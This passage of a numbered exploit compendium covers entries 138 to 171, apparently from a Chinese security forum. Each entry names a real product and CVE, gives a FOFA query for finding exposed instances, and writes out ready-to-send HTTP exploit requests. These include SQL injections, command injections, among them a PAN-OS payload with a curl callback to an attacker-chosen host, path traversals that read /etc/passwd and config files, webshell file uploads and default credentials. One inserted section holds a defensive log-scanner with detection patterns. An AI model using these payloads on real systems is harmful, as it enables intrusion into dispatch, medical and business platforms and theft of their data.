This and the three requests that follow are time-based blind injections: a response delayed by roughly 5 seconds confirms them.
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun (科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun (科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
Union-based injection through dep_level: the md5 of 1 is returned between two ~ characters.
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak (default) credentials
CVE-2024-29666
FOFA:body="/808gps/"
Credentials: admin/admin
143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute, base64-encoded (aWQ= decodes to id).
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
Replace <dnslog-address> with a host you control. The injected file name is picked up and executed later by the device-telemetry job, so the curl callback does not arrive immediately.
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog-address>`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
url=cnRzcDovL2EK is the base64 encoding of rtsp://a; transport URL-decodes to || (echo '[S]'; id; echo '[E]')#;, so the output of id appears between [S] and [E] in the response.
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass via server-side template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
The ;swagger-ui/ path segment makes the request match the authentication filter's swagger exclusion, so it reaches the endpoint unauthenticated; validationRules is then evaluated as a script with access to Java classes, which is how ProcessBuilder runs ipconfig and returns its output.

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
Same request shape as entry 149, running id instead of ipconfig.
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
The request as published only shows unauthenticated access to pageList via the ;swagger-ui/ bypass; the injection payload itself is not included here.
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected:
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter, i.e. the command is injected through the Basic-auth user name and the password is irrelevant.
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

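Added detection example (not from this page or from any of the vendors above): a scanner for web-server access logs that flags the request shapes collected in this list, namely the path traversals of entries 126, 129 and 147, the time- and error-based SQL injections of entries 134 to 141 and 154, the ;.jsp / ;swagger-ui/ path-parameter bypasses of entries 132 and 149 to 151, and query parameters that base64-decode to readable text as in entries 122 and 144. check_basic_auth() applies the same base64 decoding to the LoadMaster Authorization header of entry 152. The log lines are constructed from the request lines on this page with a made-up client IP and timestamps; the rule names and the set of SQL keywords are this example's own choices.

```python
import base64
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed access-log lines (common log format) replaying request lines
# shown on this page; the client IP and timestamps are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jun/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.5 - - [01/Jun/2024:10:00:02 +0000] "GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1" 200 2048
203.0.113.5 - - [01/Jun/2024:10:00:03 +0000] "POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1" 200 310
203.0.113.5 - - [01/Jun/2024:10:00:04 +0000] "GET /static/../../../../../etc/passwd HTTP/1.1" 200 1420
203.0.113.5 - - [01/Jun/2024:10:00:05 +0000] "GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1" 200 0
203.0.113.5 - - [01/Jun/2024:10:00:06 +0000] "GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1" 200 120
203.0.113.5 - - [01/Jun/2024:10:00:07 +0000] "POST /dataSetParam/verification;swagger-ui/ HTTP/1.1" 200 64
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
SQLI_RE = re.compile(r"(?i)\b(?:sleep|pg_sleep|updatexml|extractvalue|benchmark)\s*\("
                     r"|\bunion\s+(?:all\s+)?select\b"
                     r"|\bselect\b.*\b(?:database|version|user)\s*\(")
TRAVERSAL_RE = re.compile(r"(?:^|/)\.\.(?:/|$)")
# TeamCity "?jsp=...;.jsp" (CVE-2024-27198) and AJ-Report ";swagger-ui/" both
# use a path parameter to slip past the authentication filter.
PATH_PARAM_BYPASS_RE = re.compile(r";\.jsp\b|;swagger-ui/")


def parse_log_line(line):
    """Split one common-log-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def try_base64(value):
    """Decode value as (possibly unpadded) base64; return printable ASCII text or None."""
    stripped = value.rstrip("=")
    if not re.fullmatch(r"[A-Za-z0-9+/]{2,}", stripped) or -len(stripped) % 4 == 3:
        return None  # not base64 alphabet, or a length no base64 string can have
    try:
        raw = base64.b64decode(stripped + "=" * (-len(stripped) % 4), validate=True)
    except ValueError:
        return None
    if raw and all(32 <= b < 127 for b in raw):
        return raw.decode("ascii")
    return None


def check_target(target):
    """Findings for one request target (path plus query) exactly as it was logged."""
    findings = []
    decoded = unquote_plus(target)  # match on the decoded form so %27/%20 do not hide keywords
    if TRAVERSAL_RE.search(decoded):
        findings.append("path-traversal")
    if SQLI_RE.search(decoded):
        findings.append("sql-injection")
    if PATH_PARAM_BYPASS_RE.search(decoded):
        findings.append("path-parameter-bypass")
    for key, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for value in values:
            text = try_base64(value)
            if text is None:
                continue
            findings.append(f"base64-param {key}={text}")
            if SQLI_RE.search(text):
                findings.append("sql-injection")
    return list(dict.fromkeys(findings))  # de-duplicate, keep order


def scan_log(text):
    """Return (ip, target, findings) for every log line that triggers at least one rule."""
    hits = []
    for line in text.splitlines():
        record = parse_log_line(line)
        if record is None:
            continue
        findings = check_target(record["target"])
        if findings:
            hits.append((record["ip"], record["target"], findings))
    return hits


def check_basic_auth(header):
    """Decode an Authorization: Basic value; flag shell metacharacters in the user name."""
    scheme, _, token = header.partition(" ")
    if scheme.lower() != "basic":
        return None
    credentials = try_base64(token.strip())
    if credentials is None or ":" not in credentials:
        return None
    user, _, password = credentials.partition(":")
    return user, password, any(c in user for c in ";|&`$")


if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, target, findings)
    print(check_basic_auth("Basic JztsczsnOmRvZXNub3RtYXR0ZXI="))
```

To use it on a real log, pass the file's text to scan_log(). Standard access logs do not record the Authorization header, so check_basic_auth() is meant for a reverse proxy or WAF that sees the header before it reaches LoadMaster.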
153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config and take a component id from its components list
http://x.x.x.x/config

Step 2: make the server copy /etc/passwd into a temporary file under its cache directory (the path it creates is returned in the response)
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: fetch the cached copy through the file= route
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier (天维尔) fire-rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
Time-based blind injection against a PostgreSQL backend: PG_SLEEP(5) delays the response by about 5 seconds.
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

The uploaded file is served at the path returned in the response, e.g. http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
Affected models:
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. MetaCRM (美特CRM) upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

The uploaded file is then served at http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS / Masa CMS processAsyncObject SQL injection (error probe; entry 187 carries the time-based payload)
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. INFINITT PACS (英飞达医学影像存档与通信系统) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

The uploaded handler is then reachable at /1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and arbitrary file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. Keytop (科拓) smart parking payment system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> element sets the file name (the ../ prefix walks out of the upload directory) and <fileFlow> carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Step 2: the uploaded file is then served at http://x.x.x.x/dizxdell.aspx

162. Hefeng (和丰) multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

The uploaded file is then served at http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. Haoka Jituan (号卡极团) distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. Smart Campus (慧校园 / 安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

The uploaded file is then served at http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx (the server stores it as update.aspx, not under the submitted name).

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
(The middle of the URL was truncated by the forum; the injection point is the sortOrder parameter, which is appended to an ORDER BY clause.)

166. Zhongcheng Kexin (中成科信) ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. Lean Value Management System (精益价值管理系统) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. Hongjing (宏景) EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. Hongjing (宏景) EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. Hongjing (宏景) EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. Tongtianxing (通天星) CMSV6 vehicle GPS monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
